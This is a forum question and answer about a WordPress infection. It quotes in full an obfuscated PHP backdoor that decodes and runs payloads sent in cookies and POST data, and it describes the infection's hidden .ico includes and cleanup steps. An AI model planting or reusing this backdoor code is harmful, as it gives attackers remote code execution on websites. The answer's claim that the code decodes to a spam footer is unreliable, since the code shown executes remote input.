What's the effect if this malware if infected your WP?

by jasaweb   Last Updated October 19, 2019 08:08 AM - source

Just curious here and I need better understanding about this malware. Because their are websites are infected by this malware including my websites. But I can clean them all. Usually this malware written in strange name in .php file, inside this file:

$hsexdir = 'pmi9kl4H61gcbayrf_xsuo*-5#vden3t\'7';$yiorkoj = Array();$yiorkoj[] = $hsexdir[11].$hsexdir[15].$hsexdir[28].$hsexdir[13].$hsexdir[31].$hsexdir[28].$hsexdir[17].$hsexdir[16].$hsexdir[20].$hsexdir[29].$hsexdir[11].$hsexdir[31].$hsexdir[2].$hsexdir[21].$hsexdir[29];$yiorkoj[] = $hsexdir[7].$hsexdir[22];$yiorkoj[] = $hsexdir[24].$hsexdir[27].$hsexdir[11].$hsexdir[6].$hsexdir[13].$hsexdir[13].$hsexdir[8].$hsexdir[24].$hsexdir[23].$hsexdir[3].$hsexdir[27].$hsexdir[24].$hsexdir[24].$hsexdir[23].$hsexdir[6].$hsexdir[16].$hsexdir[12].$hsexdir[24].$hsexdir[23].$hsexdir[13].$hsexdir[33].$hsexdir[11].$hsexdir[27].$hsexdir[23].$hsexdir[28].$hsexdir[28].$hsexdir[24].$hsexdir[8].$hsexdir[9].$hsexdir[27].$hsexdir[11].$hsexdir[30].$hsexdir[13].$hsexdir[27].$hsexdir[11].$hsexdir[28];$yiorkoj[] = $hsexdir[25];$yiorkoj[] = $hsexdir[11].$hsexdir[21].$hsexdir[20].$hsexdir[29].$hsexdir[31];$yiorkoj[] = $hsexdir[19].$hsexdir[31].$hsexdir[15].$hsexdir[17].$hsexdir[15].$hsexdir[28].$hsexdir[0].$hsexdir[28].$hsexdir[13].$hsexdir[31];$yiorkoj[] = $hsexdir[28].$hsexdir[18].$hsexdir[0].$hsexdir[5].$hsexdir[21].$hsexdir[27].$hsexdir[28];$yiorkoj[] = $hsexdir[19].$hsexdir[20].$hsexdir[12].$hsexdir[19].$hsexdir[31].$hsexdir[15];$yiorkoj[] = $hsexdir[13].$hsexdir[15].$hsexdir[15].$hsexdir[13].$hsexdir[14].$hsexdir[17].$hsexdir[1].$hsexdir[28].$hsexdir[15].$hsexdir[10].$hsexdir[28];$yiorkoj[] = $hsexdir[19].$hsexdir[31].$hsexdir[15].$hsexdir[5].$hsexdir[28].$hsexdir[29];$yiorkoj[] = $hsexdir[0].$hsexdir[13].$hsexdir[11].$hsexdir[4];foreach ($yiorkoj[8]($_COOKIE, $_POST) as $sgmcz => $tfbhhc){function ouvcux($yiorkoj, $sgmcz, $lcrwjj){return $yiorkoj[7]($yiorkoj[5]($sgmcz . $yiorkoj[2], ($lcrwjj / $yiorkoj[9]($sgmcz)) + 1), 0, $lcrwjj);}function jnlge($yiorkoj, $ysittw){return @$yiorkoj[10]($yiorkoj[1], $ysittw);}function njfgaru($yiorkoj, $ysittw){$epjvwf = $yiorkoj[4]($ysittw) % 3;if (!$epjvwf) {$oqkbtbd = $yiorkoj[0]; $qyzju = $oqkbtbd("", $ysittw[1]($ysittw[2]));$qyzju();exit();}}$tfbhhc = jnlge($yiorkoj, $tfbhhc);njfgaru($yiorkoj, $yiorkoj[6]($yiorkoj[3], $tfbhhc ^ ouvcux($yiorkoj, $sgmcz, $yiorkoj[9]($tfbhhc))));}

and that malware creates many index.php files in folders and also this malware adds code in index.php (real one), wp-config.php, and wp-setting.php. This malware changes the file permission of those infected files to 0755. Inside of this index.php (original and fake) and those original WP files there is an encrypted code of the destination directories to the other malware with .ico (extension) or favicon file.

May be expert can explain more.

Tags : wordpress.com

Answers 1

I'm also seeing this on a hosting place that has several WP installs. Cleaning them up (removing files that aren't supposed to be there, removing code) hasn't fixed things yet, it keeps coming back.

If you want to decode strings like that, use the https://www.unphp.net site. Use the recursive check button.

I've found bad code in wp-settings.php, wp-config.php, index.php, ico files (that start with a dot to make them hidden), random-name.php, rouge 500.php files inside the WP installs, and non-WP sites.

Not sure where the re-infection is coming from. Have reset credentials everywhere (hosting, ftp, WP users, etc) to no avail.

I think there might be some code inside the wp-posts table. Today's task is to look for that.

For your code, it evaluates (via the www.unphp.net site) to this; other infected files have the same eval of the obfusticated code:

<?php ?><div style="clear: both"></div>
<div id="foot">
<a href="<?php bloginfo('url'); ?>">Home</a><?php $pages = wp_list_pages('depth=1&title_li=&echo=0');
$pages2 = preg_split('/(<li[^>]*>)/', $pages);
foreach ($pages2 as $var) {
    echo str_replace('</li>', '', $var);
} ?> <br/>
Distributed by <a href="http://mondaydressing.com">Baju Grosiran</a><br/>
<?php wp_footer(); ?>
<?php $header_ads_act = get_theme_option('footer_ads_act1');
if (($header_ads_act == '') || ($header_ads_act == 'No')) { ?>
Copyright &#169; <?php echo date("Y") ?> <a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a><?php
} else { ?><?php echo get_theme_option('footer_ads1'); ?><?php
} ?>

Still analyzing; will add to this answer as I find out more.


The 'ico' files with a dot in front contain PHP code that also evaluates to the above code. There are @include commands in the modified files that point to those ico file so that the code inside will be executed.

Added 19 Oct 2019 630pm PST

Notices that there are many files, mostly index.php, that have permissions of 'execute' (755). That is an indicator of the file containing some obfusticated code (decoded via the site linked above).

Some of the decoded strings will point to the malware'd ICO file.

But all of the encoded strings decode to the above code.

Did find a couple of draft posts with author number '0' in one of the WP sites. But no indication of the malware's entry point yet.

Added 20 Oct 2019

Still have not found the source of the code insertions. I can clean the entire site (I think) and files are re-attacked the next day.

I've done all of the standard things, to no avail.

I'm building a program that will scan all files and look for files that may have been hacked; perhaps I am missing some.

The problem is made more complex by the server (dedicated VPS server at a hosting place) having multiple sites, WP and non-WP. All sites are being affected, with files randomly placed throughout all folders.

I'll figure this one out. Luckily, the sites are low-traffic. But it is not feasible to do a 'nuke'. I'll keep reporting here...

Added 24 Oct 2019

I've written a program that helps me identify possible hacked files based on their content. Not a true 'anti-virus' thing, but a good (IMHO) program to identify areas of concerns.

If you (or anyone else) interested, please contact me on my https://www.securitydawg.com site.

Added 11 Nov 2019

Site is still getting modified. The wp-settings/wp-config files, adding of the hidden ico files, random-named php files, and modified index.php (including index.php files where they shouldn't be).

Additional things done (in addition to above):

  • Change permissions of the wp-config.php and wp-settings.php to 400 or
  • Change the password of the WP database(s) to something very strong.
  • Look at the wp-posts table for wp-content fields that are not normal (like just a bunch of random numbers). Delete those entries. They
    will most likely be towards the end of the table, but look at every

We shall see how that works.

Rick Hellewell
Rick Hellewell
October 19, 2019 18:07 PM

Related Questions

Could not upload the new theme in WordPress

Updated September 26, 2017 19:08 PM

how to stay logged in without cookie validation

Updated October 19, 2018 06:08 AM